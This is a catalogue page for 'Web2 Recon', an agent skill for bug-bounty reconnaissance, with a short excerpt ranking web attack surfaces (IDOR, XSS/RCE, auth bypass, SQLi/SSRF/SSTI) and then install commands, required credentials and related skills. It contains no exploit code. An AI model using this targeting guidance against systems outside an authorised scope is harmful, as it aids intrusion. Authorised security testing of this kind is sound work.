Run gf patterns and the interesting-params grep above.
Open Burp Suite. Browse the app with proxy on:
Priority 1: API endpoints with ID parameters → IDOR candidates
Priority 2: File upload features → XSS/RCE candidates
Priority 3: OAuth/SSO flows → auth bypass candidates
Priority 4: Search/filter with user input → SQLi/SSRF/SSTI candidates
Priority 5: Admin/debug endpoints → auth bypass candidates© awarexone, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in skills/web2-recon of awarexone/Agentic-Bug-Hunter.
Open the folder on GitHubat commit cd58a40
We found 2 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 2 other GitHub owners. This page covers the copy in awarexone/Agentic-Bug-Hunter, which our catalogue first saw on October 7, 2026.
Web2 Recon next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Web2 Recon this skillawarexone/Agentic-Bug-Hunter | 5.3k | 2 repos | ~6.4k | Automated safety check: Warn | MIT | |
| CybersecurityAgriciDaniel/claude-cybersecurity | 227 | — | ~11k | Automated safety check: Warn | MIT | |
| ClusterfuzzliteInternationalColorConsortium/iccDEV | 183 | — | ~1.5k | Automated safety check: Pass | BSD-3-Clause | |
| Audit Context Buildingtrailofbits/skills | 7.4k | — | ~996 | Automated safety check: Pass | CC-BY-SA-4.0 | |
| Recon Osinthypnguyen1209/offensive-claude | 386 | — | ~2.2k | Automated safety check: Pass | MIT | |
| Hunt Auth Bypasselementalsouls/Claude-BugHunter | 4.8k | — | ~8.2k | Automated safety check: Pass | MIT |
AgriciDaniel/claude-cybersecurity
Ultimate AI-powered cybersecurity code review skill. An agent skill from AgriciDaniel/claude-cybersecurity.
InternationalColorConsortium/iccDEV
Build, test, or update the iccDEV ClusterFuzzLite libFuzzer integration across ASan, UBSan, and MSan.
trailofbits/skills
Understand a codebase before looking for bugs in it - what each function assumes, what it guarantees, and what it depends on elsewhere.
hypnguyen1209/offensive-claude
A skill your agent uses when mapping a target's external attack surface or gathering OSINT — subdomain enumeration, attack-surface mapping (httpx/katana/JS secrets), subdomain takeover…
elementalsouls/Claude-BugHunter
Hunting skill for auth bypass vulnerabilities. An agent skill from elementalsouls/Claude-BugHunter.
sickn33/agentic-awesome-skills
External recon for software supply-chain attack surface. An agent skill from sickn33/agentic-awesome-skills.
awarexone/Agentic-Bug-Hunter
Guides smart contract audits and bounty target selection with ten DeFi bug classes, kill signals, a Foundry PoC template and grep patterns.
awarexone/Agentic-Bug-Hunter
Orchestrates a bug bounty session with a 5-phase workflow and a critical-thinking framework covering developer psychology, anomaly detection and What-If experiments.
awarexone/Agentic-Bug-Hunter
Recovers a client-side request signature or anti-bot token just far enough to replay blocked requests in bug bounty testing, starting from a captured packet.
awarexone/Agentic-Bug-Hunter
Screens EVM and Solana meme coins for rug pull signs such as hidden mint, honeypot logic and fee tricks, starting with fast kill signals before any code review.
awarexone/Agentic-Bug-Hunter
Screens a vulnerability finding with a seven-question gate and pre-submission checks before any report is written, so weak or out-of-scope findings are dropped early.
awarexone/Agentic-Bug-Hunter
Guides writing bug bounty reports for HackerOne, Bugcrowd, Intigriti and Immunefi: impact-first titles, proven claims, CVSS 3.1 scoring and a pre-submit checklist.
Works with
Categories
Web2 recon pipeline — subdomain enumeration (subfinder, Chaos API, assetfinder), live host discovery (dnsx, httpx), URL crawling (katana, waybackurls, gau), directory fuzzing (ffuf), JS analysis…. Web2 Recon is an agent skill from awarexone/Agentic-Bug-Hunter. Web2 recon pipeline — subdomain enumeration (subfinder, Chaos API, assetfinder), live host discovery (dnsx, httpx), URL crawling (katana, waybackurls, gau), directory fuzzing (ffuf), JS analysis (LinkFinder, SecretFinder), continuous monitoring (new subdomain alerts, JS change detection, GitHub commit watch).
Web2 Recon fits situations like: starting recon on any web2 target; asked about asset discovery; attack surface mapping.
Run `npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a claude-code`. Or copy the skill folder (skills/web2-recon in awarexone/Agentic-Bug-Hunter) into .claude/skills/web2-recon in your project. Claude Code loads it when a task matches its description.
Run `npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a codex`. Or copy the skill folder (skills/web2-recon in awarexone/Agentic-Bug-Hunter) into .agents/skills/web2-recon in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add awarexone/Agentic-Bug-Hunter --skill web2-recon -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/web2-recon, .gemini/skills/web2-recon, .github/skills/web2-recon and .opencode/skills/web2-recon in your project.
Going by SKILL.md and its folder, Web2 Recon needs the command-line tools its instructions call (curl, python3, jq, git, pip and gh) and credentials named CHAOS_API_KEY, DB_PASSWORD, APP_KEY and AWS_SECRET. Our summary lists: Python 3; Node.js; A credential in CHAOS_API_KEY; A credential in YOUR_VT_KEY.
SKILL.md names 4 domains. In commands or code: dns.projectdiscovery.io, api.github.com, crt.sh and github.com; the agent is likely to contact these when it follows the instructions. This is read from the text; nothing was executed.
Our automated static check of SKILL.md flagged 1 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way.
Web2 Recon is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.
About 6.4k tokens (SKILL.md is roughly 26k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with Web2 Recon: Cybersecurity (AgriciDaniel/claude-cybersecurity, 227 stars), Clusterfuzzlite (InternationalColorConsortium/iccDEV, 183 stars), Audit Context Building (trailofbits/skills, 7.4k stars) and Recon Osint (hypnguyen1209/offensive-claude, 386 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
awarexone (a GitHub organization) maintains it in awarexone/Agentic-Bug-Hunter, which has 5,296 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on October 5, 2026.
Source: awarexone/Agentic-Bug-Hunter on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.